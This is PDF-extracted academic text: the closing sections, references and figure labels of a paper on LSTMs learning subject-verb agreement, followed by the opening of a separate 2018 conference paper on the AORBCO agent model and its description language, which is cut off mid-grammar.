in English (Zwicky, 2005). In future work, explor- ing the relationship between these cases and neural network predictions can shed light on the cognitive plausibility of those networks. 10 Conclusion LSTMs are sequence models; they do not have built- in hierarchical representations. We have investigated how well they can learn subject-verb agreement, a phenomenon that crucially depends on hierarchical syntactic structure. When provided explicit supervi- sion, LSTMs were able to learn to perform the verb- number agreement task in most cases, although their error rate increased on particularly difficult sentences. We conclude that LSTMs can learn to approximate structure-sensitive dependencies fairly well given ex- plicit supervision, but more expressive architectures may be necessary to eliminate errors altogether. Fi- nally, our results provide evidence that the language modeling objective is not by itself sufficient for learn- ing structure-sensitive dependencies, and suggest that a joint training objective can be used to supplement language models on tasks for which syntax-sensitive dependencies are important. 532 Acknowledgments We thank Marco Baroni, Grzegorz Chrupała, Alexan- der Clark, Sol Lago, Paul Smolensky, Benjamin Spector and Roberto Zamparelli for comments and discussion. This research was supported by the European Research Council (grant ERC-2011-AdG 295810 BOOTPHON), the Agence Nationale pour la Recherche (grants ANR-10-IDEX-0001-02 PSL and ANR-10-LABX-0087 IEC) and the Israeli Science Foundation (grant number 1555/15). References Joseph Allen and Mark S. Seidenberg. 1999. The emer- gence of grammaticality in connectionist networks. In Brian MacWhinney, editor, Emergentist approaches to language: Proceedings of the 28th Carnegie sym- posium on cognition, pages 115–151. Mahwah, NJ: Erlbaum. Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Bengio. 2015. Neural machine translation by jointly learning to align and translate. In International Conference for Learning Representations. Emily M. Bender, Dan Flickinger, Stephan Oepen, and Yi Zhang. 2011. Parser evaluation over local and non-local deep dependencies in a large corpus. In Pro- ceedings of EMNLP, pages 397–408. Kathryn Bock and Carol A. Miller. 1991. Broken agree- ment. Cognitive Psychology, 23(1):45–93. Melissa Bowerman. 1988. The “no negative evidence” problem: How do children avoid constructing an overly general grammar? In John A. Hawkins, editor, Explain- ing language universals, pages 73–101. Oxford: Basil Blackwell. Samuel R. Bowman, Christopher D. Manning, and Christopher Potts. 2015. Tree-structured composi- tion in neural networks without tree-structured archi- tectures. In Proceedings of the NIPS Workshop on Cog- nitive Computation: Integrating Neural and Symbolic Approaches. Bo Cartling. 2008. On the implicit acquisition of a context-free grammar by a simple recurrent neural net- work. Neurocomputing, 71(7):1527–1537. Rich Caruana. 1998. Multitask learning. In Sebastian Thrun and Lorien Pratt, editors, Learning to learn, pages 95–133. Boston: Kluwer. Ciprian Chelba, Tomas Mikolov, Mike Schuster, Qi Ge, Thorsten Brants, Phillipp Koehn, and Tony Robin- son. 2013. One billion word benchmark for measur- ing progress in statistical language modeling. arXiv preprint arXiv:1312.3005. Kyunghyun Cho, Bart van Merrienboer, Caglar Gulcehre, Dzmitry Bahdanau, Fethi Bougares, Holger Schwenk, and Yoshua Bengio. 2014. Learning phrase repre- sentations using RNN encoder–decoder for statistical machine translation. In Proceedings of EMNLP, pages 1724–1734. Noam Chomsky. 1965. Aspects of the Theory of Syntax. Cambridge, MA: MIT press. Alexander Clark, Gianluca Giorgolo, and Shalom Lap- pin. 2013. Statistical representation of grammaticality judgements: The limits of n-gram models. In Proceed- ings of the Fourth Annual Workshop on Cognitive Mod- eling and Computational Linguistics (CMCL), pages 28–36. Chris Dyer, Adhiguna Kuncoro, Miguel Ballesteros, and A. Noah Smith. 2016. Recurrent neural network gram- mars. In Proceedings of NAACL/HLT, pages 199–209. Kathleen M. Eberhard, J. Cooper Cutting, and Kathryn Bock. 2005. Making syntax of sense: Number agree- ment in sentence production. Psychological Review, 112(3):531–559. Jeffrey L. Elman. 1990. Finding structure in time. Cogni- tive Science, 14(2):179–211. Jeffrey L. Elman. 1991. Distributed representations, sim- ple recurrent networks, and grammatical structure. Ma- chine Learning, 7(2-3):195–225. Jeffrey L. Elman. 1993. Learning and development in neu- ral networks: The importance of starting small. Cogni- tion, 48(1):71–99. Martin B. H. Everaert, Marinus A. C. Huybregts, Noam Chomsky, Robert C. Berwick, and Johan J. Bolhuis. 2015. Structures, not strings: Linguistics as part of the cognitive sciences. Trends in Cognitive Sciences, 19(12):729–743. Robert Frank, Donald Mathis, and William Badecker. 2013. The acquisition of anaphora by simple recur- rent networks. Language Acquisition, 20(3):181–227. Felix Gers and Jürgen Schmidhuber. 2001. LSTM re- current networks learn simple context-free and context- sensitive languages. IEEE Transactions on Neural Net- works, 12(6):1333–1340. Anastasia Giannakidou. 2011. Negative and positive polarity items: Variation, licensing, and compositional- ity. In Claudia Maienborn, Klaus von Heusinger, and Paul Portner, editors, Semantics: An international hand- book of natural language meaning. Berlin: Mouton de Gruyter. Yoav Goldberg and Joakim Nivre. 2012. A dynamic ora- cle for arc-eager dependency parsing. In Proceedings of COLING 2012, pages 959–976. Edward Grefenstette, Karl Moritz Hermann, Mustafa Su- leyman, and Phil Blunsom. 2015. Learning to trans- duce with unbounded memory. In Advances in Neural Information Processing Systems, pages 1828–1836. 533 Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. Rodney Huddleston and Geoffrey K. Pullum. 2002. The Cambridge Grammar of the English Language. Cam- bridge University Press, Cambridge. Armand Joulin and Tomas Mikolov. 2015. Inferring algorithmic patterns with stack-augmented recurrent nets. In Advances in Neural Information Processing Systems, pages 190–198. Rafal Jozefowicz, Oriol Vinyals, Mike Schuster, Noam Shazeer, and Yonghui Wu. 2016. Exploring the limits of language modeling. arXiv preprint arXiv:1602.02410. Ákos Kádár, Grzegorz Chrupała, and Afra Alishahi. 2016. Representation of linguistic form and func- tion in recurrent neural networks. arXiv preprint arXiv:1602.08952. Andrej Karpathy, Justin Johnson, and Fei-Fei Li. 2016. Visualizing and understanding recurrent networks. In ICLR Workshop. Diederik Kingma and Jimmy Ba. 2015. Adam: A method for stochastic optimization. In International Confer- ence for Learning Representations. Eliyahu Kiperwasser and Yoav Goldberg. 2016. Simple and accurate dependency parsing using bidirectional lstm feature representations. Transactions of the Asso- ciation of Computational Linguistics, 4:313–327. Jey Han Lau, Alexander Clark, and Shalom Lappin. 2015. Unsupervised prediction of acceptability judgements. In Proceedings of ACL/IJCNLP, pages 1618–1628. Steve Lawrence, Lee C. Giles, and Santliway Fong. 1996. Can recurrent neural networks learn natural language grammars? In IEEE International Conference on Neu- ral Networks, volume 4, pages 1853–1858. Willem J. M. Levelt, Ardi Roelofs, and Antje S. Meyer. 1999. A theory of lexical access in speech production. Behavioral and Brain Sciences, 22(1):1–75. Jiwei Li, Xinlei Chen, Eduard H. Hovy, and Dan Jurafsky. 2016. Visualizing and understanding neural models in NLP. In Proceedings of NAACL-HLT 2016, pages 681–691. Franc Marušič, Andrew Nevins, and Amanda Saksida. 2007. Last-conjunct agreement in Slovenian. In An- nual Workshop on Formal Approaches to Slavic Lin- guistics, pages 210–227. Tomas Mikolov, Martin Karafiát, Lukas Burget, Jan Cer- nockỳ, and Sanjeev Khudanpur. 2010. Recurrent neu- ral network based language model. In INTERSPEECH, pages 1045–1048. Janet L. Nicol, Kenneth I. Forster, and Csaba Veres. 1997. Subject–verb agreement processes in comprehension. Journal of Memory and Language, 36(4):569–587. Joakim Nivre, Laura Rimell, Ryan McDonald, and Carlos Gomez-Rodriguez. 2010. Evaluation of dependency parsers on unbounded dependencies. In Proceedings of the 23rd International Conference on Computational Linguistics, pages 833–841. Association for Computa- tional Linguistics. Laura Rimell, Stephen Clark, and Mark Steedman. 2009. Unbounded dependency recovery for parser evaluation. In Proceedings of EMNLP, pages 813–821. Paul Rodriguez, Janet Wiles, and Jeffrey L. Elman. 1999. A recurrent neural network that learns to count. Con- nection Science, 11(1):5–40. Paul Rodriguez. 2001. Simple recurrent networks learn context-free and context-sensitive languages by count- ing. Neural Computation, 13(9):2093–2118. Douglas L. T. Rohde and David C. Plaut. 1999. Language acquisition in the absence of explicit negative evidence: How important is starting small? Cognition, 72(1):67– 109. John Robert Ross. 1967. Constraints on variables in syntax. Ph.D. thesis, MIT. Carson T. Schütze. 1996. The empirical base of linguis- tics: Grammaticality judgments and linguistic method- ology. Chicago, IL: University of Chicago Press. Richard Socher. 2014. Recursive Deep Learning for Natural Language Processing and Computer Vision. Ph.D. thesis, Stanford University. Adrian Staub. 2009. On the interpretation of the number attraction effect: Response time evidence. Journal of Memory and Language, 60(2):308–327. Martin Sundermeyer, Ralf Schlüter, and Hermann Ney. 2012. LSTM neural networks for language modeling. In INTERSPEECH. Darren Tanner, Janet Nicol, and Laurel Brehm. 2014. The time-course of feature interference in agreement com- prehension: Multiple mechanisms and asymmetrical attraction. Journal of Memory and Language, 76:195– 215. Oriol Vinyals, Łukasz Kaiser, Terry Koo, Slav Petrov, Ilya Sutskever, and Geoffrey Hinton. 2015. Grammar as a foreign language. In Advances in Neural Information Processing Systems, pages 2755–2763. Arnold Zwicky. 2005. Agreement with nearest always bad? http://itre.cis.upenn.edu/˜myl/ languagelog/archives/001846.html. 534 th e X( s) of th e Y( s) 1.0 0.8 0.6 0.4 0.2 0.0 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 0: PP th e X( s) th at th e Y( s) 1.0 0.8 0.6 0.4 0.2 0.0 0.2 X,Y X,YsXs,Y Xs,Ys Unit 0: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 1.0 X,Y X,Ys Xs,YXs,Ys Unit 1: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 1.0 X,Y X,Ys Xs,Y Xs,Ys Unit 1: RC th e X( s) of th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 2: PP th e X( s) th at th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 2: RC th e X( s) of th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 3: PP th e X( s) th at th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 X,Y X,YsXs,Y Xs,Ys Unit 3: RC th e X( s) of th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 4: PP th e X( s) th at th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 4: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 5: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 5: RC th e X( s) of th e Y( s) 1.0 0.5 0.0 0.5 X,YX,Ys Xs,Y Xs,Ys Unit 6: PP th e X( s) th at th e Y( s) 1.0 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 6: RC th e X( s) of th e Y( s) 0.0 0.2 0.4 0.6 0.8 X,YX,Ys Xs,Y Xs,Ys Unit 7: PP th e X( s) th at th e Y( s) 0.0 0.2 0.4 0.6 0.8 X,Y X,Ys Xs,Y Xs,Ys Unit 7: RC th e X( s) of th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 8: PP th e X( s) th at th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 8: RC th e X( s) of th e Y( s) 0.0 0.2 0.4 0.6 0.8 X,YX,YsXs,Y Xs,Ys Unit 9: PP th e X( s) th at th e Y( s) 0.0 0.2 0.4 0.6 0.8 X,Y X,Ys Xs,Y Xs,Ys Unit 9: RC th e X( s) of th e Y( s) 1.0 0.8 0.6 0.4 0.2 0.0 X,Y X,Ys Xs,Y Xs,Ys Unit 10: PP th e X( s) th at th e Y( s) 1.0 0.8 0.6 0.4 0.2 0.0 X,Y X,Ys Xs,Y Xs,Ys Unit 10: RC th e X( s) of th e Y( s) 1.0 0.5 0.0 0.5 1.0 X,YX,Ys Xs,Y Xs,Ys Unit 11: PP th e X( s) th at th e Y( s) 1.0 0.5 0.0 0.5 1.0 X,Y X,YsXs,Y Xs,Ys Unit 11: RC th e X( s) of th e Y( s) 1.0 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 12: PP th e X( s) th at th e Y( s) 1.0 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 12: RC th e X( s) of th e Y( s) 0.4 0.2 0.0 0.2 0.4 X,YX,Ys Xs,YXs,Ys Unit 13: PP th e X( s) th at th e Y( s) 0.4 0.2 0.0 0.2 0.4 X,YX,Ys Xs,YXs,Ys Unit 13: RC th e X( s) of th e Y( s) 0.6 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 14: PP th e X( s) th at th e Y( s) 0.6 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 14: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 X,Y X,Ys Xs,YXs,Ys Unit 15: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 15: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 16: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 X,YX,YsXs,Y Xs,Ys Unit 16: RC th e X( s) of th e Y( s) 0.4 0.2 0.0 0.2 0.4 0.6 0.8 X,YX,Ys Xs,Y Xs,Ys Unit 17: PP th e X( s) th at th e Y( s) 0.4 0.2 0.0 0.2 0.4 0.6 0.8 X,Y X,Ys Xs,Y Xs,Ys Unit 17: RC th e X( s) of th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 18: PP th e X( s) th at th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 18: RC th e X( s) of th e Y( s) 0.2 0.4 0.6 0.8 X,YX,YsXs,Y Xs,Ys Unit 19: PP th e X( s) th at th e Y( s) 0.2 0.4 0.6 0.8 X,Y X,Ys Xs,Y Xs,Ys Unit 19: RC th e X( s) of th e Y( s) 0.4 0.2 0.0 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 20: PP th e X( s) th at th e Y( s) 0.4 0.2 0.0 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 20: RC th e X( s) of th e Y( s) 0.2 0.1 0.0 0.1 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 21: PP th e X( s) th at th e Y( s) 0.2 0.1 0.0 0.1 0.2 X,YX,Ys Xs,Y Xs,Ys Unit 21: RC th e X( s) of th e Y( s) 0.4 0.2 0.0 0.2 0.4 0.6 0.8 X,Y X,Ys Xs,Y Xs,Ys Unit 22: PP th e X( s) th at th e Y( s) 0.4 0.2 0.0 0.2 0.4 0.6 0.8 X,YX,Ys Xs,Y Xs,Ys Unit 22: RC th e X( s) of th e Y( s) 0.15 0.10 0.05 0.00 0.05 0.10 X,Y X,Ys Xs,Y Xs,Ys Unit 23: PP th e X( s) th at th e Y( s) 0.15 0.10 0.05 0.00 0.05 0.10 X,YX,Ys Xs,YXs,Ys Unit 23: RC th e X( s) of th e Y( s) 1.0 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 24: PP th e X( s) th at th e Y( s) 1.0 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 24: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 1.0 X,Y X,Ys Xs,Y Xs,Ys Unit 25: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 1.0 X,Y X,Ys Xs,Y Xs,Ys Unit 25: RC th e X( s) of th e Y( s) 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,YXs,Ys Unit 26: PP th e X( s) th at th e Y( s) 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,YXs,Ys Unit 26: RC th e X( s) of th e Y( s) 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 X,Y X,YsXs,Y Xs,Ys Unit 27: PP th e X( s) th at th e Y( s) 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 X,Y X,Ys Xs,Y Xs,Ys Unit 27: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 X,YX,YsXs,Y Xs,Ys Unit 28: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 28: RC th e X( s) of th e Y( s) 1.0 0.8 0.6 0.4 0.2 0.0 X,Y X,Ys Xs,Y Xs,Ys Unit 29: PP th e X( s) th at th e Y( s) 1.0 0.8 0.6 0.4 0.2 0.0 X,Y X,YsXs,Y Xs,Ys Unit 29: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 1.0 X,Y X,Ys Xs,Y Xs,Ys Unit 30: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 1.0 X,YX,Ys Xs,Y Xs,Ys Unit 30: RC th e X( s) of th e Y( s) 0.7 0.6 0.5 0.4 0.3 0.2 0.1 0.0 X,Y X,Ys Xs,Y Xs,Ys Unit 31: PP th e X( s) th at th e Y( s) 0.7 0.6 0.5 0.4 0.3 0.2 0.1 0.0 X,Y X,Ys Xs,Y Xs,Ys Unit 31: RC th e X( s) of th e Y( s) 0.0 0.1 0.2 0.3 0.4 0.5 0.6 X,Y X,Ys Xs,Y Xs,Ys Unit 32: PP th e X( s) th at th e Y( s) 0.0 0.1 0.2 0.3 0.4 0.5 0.6 X,Y X,Ys Xs,Y Xs,Ys Unit 32: RC th e X( s) of th e Y( s) 1.0 0.5 0.0 0.5 X,YX,Ys Xs,Y Xs,Ys Unit 33: PP th e X( s) th at th e Y( s) 1.0 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 33: RC th e X( s) of th e Y( s) 0.2 0.0 0.2 0.4 0.6 0.8 X,Y X,Ys Xs,YXs,Ys Unit 34: PP th e X( s) th at th e Y( s) 0.2 0.0 0.2 0.4 0.6 0.8 X,Y X,Ys Xs,Y Xs,Ys Unit 34: RC th e X( s) of th e Y( s) 0.4 0.2 0.0 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 35: PP th e X( s) th at th e Y( s) 0.4 0.2 0.0 0.2 X,Y X,Ys Xs,Y Xs,Ys Unit 35: RC th e X( s) of th e Y( s) 0.3 0.2 0.1 0.0 0.1 0.2 0.3 X,Y X,Ys Xs,Y Xs,Ys Unit 36: PP th e X( s) th at th e Y( s) 0.3 0.2 0.1 0.0 0.1 0.2 0.3 X,Y X,Ys Xs,Y Xs,Ys Unit 36: RC th e X( s) of th e Y( s) 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 37: PP th e X( s) th at th e Y( s) 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 37: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 1.0 X,Y X,Ys Xs,Y Xs,Ys Unit 38: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 1.0 X,Y X,Ys Xs,Y Xs,Ys Unit 38: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 1.0 X,Y X,Ys Xs,Y Xs,Ys Unit 39: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 1.0 X,Y X,Ys Xs,Y Xs,Ys Unit 39: RC th e X( s) of th e Y( s) 0.6 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 40: PP th e X( s) th at th e Y( s) 0.6 0.4 0.2 0.0 0.2 0.4 X,Y X,YsXs,Y Xs,Ys Unit 40: RC th e X( s) of th e Y( s) 0.1 0.0 0.1 0.2 0.3 0.4 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 41: PP th e X( s) th at th e Y( s) 0.1 0.0 0.1 0.2 0.3 0.4 0.5 X,YX,Ys Xs,Y Xs,Ys Unit 41: RC th e X( s) of th e Y( s) 0.0 0.1 0.2 0.3 0.4 0.5 X,YX,Ys Xs,Y Xs,Ys Unit 42: PP th e X( s) th at th e Y( s) 0.0 0.1 0.2 0.3 0.4 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 42: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 43: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 43: RC th e X( s) of th e Y( s) 0.4 0.2 0.0 0.2 0.4 0.6 0.8 1.0 X,Y X,Ys Xs,Y Xs,Ys Unit 44: PP th e X( s) th at th e Y( s) 0.4 0.2 0.0 0.2 0.4 0.6 0.8 1.0 X,Y X,Ys Xs,Y Xs,Ys Unit 44: RC th e X( s) of th e Y( s) 0.0 0.2 0.4 0.6 0.8 X,Y X,Ys Xs,Y Xs,Ys Unit 45: PP th e X( s) th at th e Y( s) 0.0 0.2 0.4 0.6 0.8 X,Y X,Ys Xs,Y Xs,Ys Unit 45: RC th e X( s) of th e Y( s) 1.0 0.5 0.0 0.5 X,Y X,Ys Xs,Y Xs,Ys Unit 46: PP th e X( s) th at th e Y( s) 1.0 0.5 0.0 0.5 X,Y X,Ys Xs,YXs,Ys Unit 46: RC th e X( s) of th e Y( s) 0.5 0.0 0.5 1.0 X,YX,Ys Xs,Y Xs,Ys Unit 47: PP th e X( s) th at th e Y( s) 0.5 0.0 0.5 1.0 X,Y X,YsXs,Y Xs,Ys Unit 47: RC th e X( s) of th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 48: PP th e X( s) th at th e Y( s) 0.8 0.6 0.4 0.2 0.0 0.2 0.4 X,Y X,Ys Xs,Y Xs,Ys Unit 48: RC th e X( s) of th e Y( s) 0.7 0.6 0.5 0.4 0.3 0.2 0.1 0.0 X,Y X,Ys Xs,Y Xs,YsUnit 49: PP th e X( s) th at th e Y( s) 0.7 0.6 0.5 0.4 0.3 0.2 0.1 0.0 X,Y X,Ys Xs,Y Xs,Ys Unit 49: RC Figure 5: Activation plots for all units (see Figure 3a). 535 536 work_w6wqmfkatfctfhp4mwewy46yta ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 101 Research on AORBCO Model and It's Description Language Zhi Min School of Computer Science and Engineering Xi’an Technological University Xi’an, China e-mail: jaja1001@qq.com Luo Junmin School of Computer Science and Engineering Xi’an Technological University Xi’an, China e-mail: robertjm@126.com Gao Wuqi School of Computer Science and Engineering Xi’an Technological University Xi’an, China e-mail: gaowuqi@126.com Abstract—This paper improves the AORBCO model based on the four characteristics of intelligence- self conscious, mutual representation, fuzziness and dynamics, and designs a description language of AORBCO model. The language describes the self-consciousness of an agent with its’ five components-belief, desire, ability, planning and behavior control mechanism. The components of entities including acquaintances of an agent and objects known by the agent are as the starting point to characterize the mutual representation of intelligence. Introducing and updating of the weights to express the closely degree of relationship among entities are to simulate the fuzzy of intelligence. The behavior control mechanism of the agent makes the intelligent dynamics realization. The AORBCO description language based on XML makes the expression form and content of the resources unify through the definition of correlative marks, which is convenient for people and computers to understand the semantics of language components. The essence of space and time is also revealed in this paper. Keywords-AORBCO; Intelligent Mode; Agent; Self- consciousness; Description Language I. THE INTRODUCTION The AORBCO model was proposed in the literature[1]. Its purpose is to unify the concepts of ontology in philosophy and computer science so that the expression form and content of the resources are combined organically. In the literature[2], the author try to unified the intelligent models of the three schools of artificial intelligence as an integrated intelligent model. However, through the study of literature[3, 4 and 5], it is known that intelligence not only has the characteristics of mutual representation, fuzziness and dynamism but also more self-awareness. The concept of ontology in philosophy refers to the origin of things, the origin is invisible and incomprehensible, and everything is just the manifestation of ontology[6] . People in computer science field uses the concept of ontology to formally define the terms used in a certain field and their relationship[7]. It is actually just a formal definition of domain knowledge only. Therefore, we think it is better not to use the concept of domain knowledge in the field of computer science, but rather to ensure the sacredness of the concept of ontology in philosophy and better understand the connotation and relationship of related concepts in computer science. Based on the above research, especially with the improvement of the original AORBCO model based on the intelligent self-awareness, this paper proposes AORBCO intelligent model with agent as the core, simulates human's thoughts and behaviors , and makes the agent imitate human's behavior model to deal with the information in order to achieve the automatic update and evolution of knowledge to make the agent more intelligent. At the same time, the AORBCO description language is designed for the model, and its description form and language structure are more in line with the new AORBCO intelligent model[8,9] expression needs.. II. A FORMAL DESCRIPTION OF AORBCO In our real life, human beings seem to live in the same world, but if you analysis carefully you can find that each person is an independent individual and has a different worldview. Each people are individuals observe from your own perspective. For each individual, the world exists in his own understanding, and it is impossible for an individual to jump out of his field of vision to see other people's "world". This is what people often say the "one person, one world". Individuals in the observing the surrounding environment and communicating with other individuals at the same time, in this process we will modify our own understanding of the concepts and its relationship, and then through self- understanding to form new ideas or new abilities; in many individual exchanges and communication we will build a common view of things and awareness, that is, domain knowledge - knowledge system based on consensus[10]. We want to simulate this process of knowledge formation and updating in the computer world, simulating human intelligence through an agent in the AORBCO intelligent model, which consists of five components of belief, desire, ability, planning, and behavior control mechanisms, Defined as follows: mailto:robertjm@126.com mailto:gaowuqi@126.com 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 102 Definition 1: Subject, agent Assume: a(t) denote the agent's cognition of its own state at time t, Aa represents the set of acquaintances recognized by the agent; Oa represents the set of objects known by the agent; Ra represents the set of relations recognized by the agent; H (t) represents the set of work completed by the agent before time t，namely the historical operation set of agent; D (t) represents the agent's desire at time t; P (t) represents the set of work to be done at time t, namely, the plan of agent to realize the current wish; behavior_controller represents the agent's behavior control mechanism; a(t)=(Aa, Oa, Ra, H(t), D(t), P(t), behavior_controller) t is what we usually say time, its essence is the order of the agent in different states (that is, what we call the space) . Definition 2: Acquaintance subject, acq-agent Assume: aa (i, t) denote the agent's cognition of acquaintance subject's state at time t, aa(i, t)  Aa. “i” represents the name or number of the subject of an acquaintance, especially the subject of an acquaintance. Aaa represents a acquaintance subject's(acq-agent.i) acquaintance set; Oaa represents a set of objects known by acq-agent. i; Raa represents a set of relations perceived by acq-agent.i; H(i, t) represents a set of work to be done before time t,namely the historical operation set of acq-agent. i; D(i, t) denotes the desire of acq-agent. i at time t; P(i, t) denotes the set of actions to be performed by acq-agent. i at time t, namely, the plan of acq-agent. i to realize the current wish; Then: aa(I, t)=(Aaa, Oaa, Raa, H(I, t), D(I, t), P(I, t)) he description of Aaa, Oaa, Raa, H(i, t), D(i, t), P(i, t) correspond to Aa, Oa, Ra, H(t), D(t) and P(t) in agent respectively, their formal definition is similar too. Definition 3: Object, object Assume: o (i, t) represents the state of the object (object.i) which the agent knows at time t, o (i, t) Oa. Oo represents the set of objects related to object. i in the agent's cognition, Oo⊆Oa; Ao represents the set of agents which are related to object. i, Ao⊆ Aa; Ro represents the set of relations related to object. i , Ro⊆Ra. o(i, t)=(Ao, Oo, Ro) Definition 4: Relationship, Ra Assume: R (ei, ej, t) represents the cognition of the subject at time t,R(ei, ej, t)∈Ra;ei, ej denotes agent or object, and Id is the relationship name; ra represent the degree of closeness, the value range [0,1]; ri represent instantaneous relationship, the value is 0 or 1; ra = Σri / t. Then: Ra(ei, ej, t)=(Id, ri, ra)，if ri is 0, ei, ej has no relationship named Id at time t; if Ra(ei, ej, t) is empty, ei and ej have no relationship. Definition 5: History, H(t) Assume:Work means the operation or sequence of operations that subject has performed. Then: a(t1) Work a(t2)∈H(t)，t1<t2<t a (t1) Work a (t2) represent the agent is from the state a (t1) to state a (t2) by executing the action. Definition 6: Desire, D(t) Assume: Work represent a operation or a operation sequence that subject planed to achieve the desired.Then: a(t1) Work a(t2)∈D(t) ，t<t1<t2 或 t1<t<t2 Definition 7: Plan, P(t) Assume: Work indicates the sequence of actions or operations to be performed by subject. Then: a(t) Work a(t1)∈P(t)，t<t1 Definition 8: Behavior control mechanism, BC U-agent indicates the user body or user, then BC could be described like this: t=t0; Initialize a(t0); While(D(t)≠null) { If (a(t)could generate W(t)) { Generate P(t) and execute it； t=t+δt； } else consult U-agent； } III. DEFINITION OF AORBCO DESCRIPTION LANGUAGE In order to make the AORBCO model practical, the BNF definition of its description language is given. In this description language ,type is used to represent types, which are basic data types and user-defined classes; val represents an object itself; weight represents a number between (0,1); suffixes with _name are Identifier; and define these keywords: agent, Belief, Act, Desire, Plan, behavior_controller, acq_Agent, acq_Object, acq_Class, acq_Bbelief, acq_Aact, acq_Ddesire, acq_Pplan, address, acq_Aagent, acq_Oobject, acq_Cclass, member ship formula, precondition, post condition, parameter (the keyword in the definition is in bold.), Arguments, its semantics will be introduced in the fourth part. TABLE I. THE SYMBOLS USED IN BNF DEFINITIONS ARE AS FOLLOWS symbols Definitions :: = "defined as" meaning [ ] there are optional {} there is a collection | the content on the left and right sides is optional Terminator in bold Non-terminal in normal fonts  subject::=<agent agent_name> BeliefSet AbilitySet DesireSet PlanSet BehaviorControl </agent agent_name> 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 103  BeliefSet::=<Belief [/] >[AcquaintanceSubjectSet  CognitiveObjectSet CognitiveClassSet</Belief>]  AbilitySet::=<Act [/] > [{Ability}</Act>]  DesireSet::=<Desire [/] >[{Desire} </Desire>]  PlanSet::=<Plan [/] > [{Plan} </Plan> ]  BehaviorControl::=<behavior_controller>ControlFu nction</behavior_controller>  AcquaintanceSubjectSet::=<acq_Agent [/]>[{AcquaintanceSubject}</acq_Agent>]  AcquaintanceSubject::=<agent_name>  weight AcquaintanceBeliefSet AcquaintanceAbilitySet AcquaintanceDesireSet AcquaintancePlanSet CommunicationInterface</agent_name>  CognitiveObjectSet ::=<acq_Object [/]>[{Object}</acq_Object>]  Object::=<object_name> {ObjectAttributes}</object_name>  CognitiveClassSet::=<acq_Class [/]>[{Class}</acq_Class>]  Class::=<class_name>weight {ClassAttributes} MembershipCalculationFormula</class_name>  Ability::=<action_name [/] >[Precondition Postcondition ParameterList  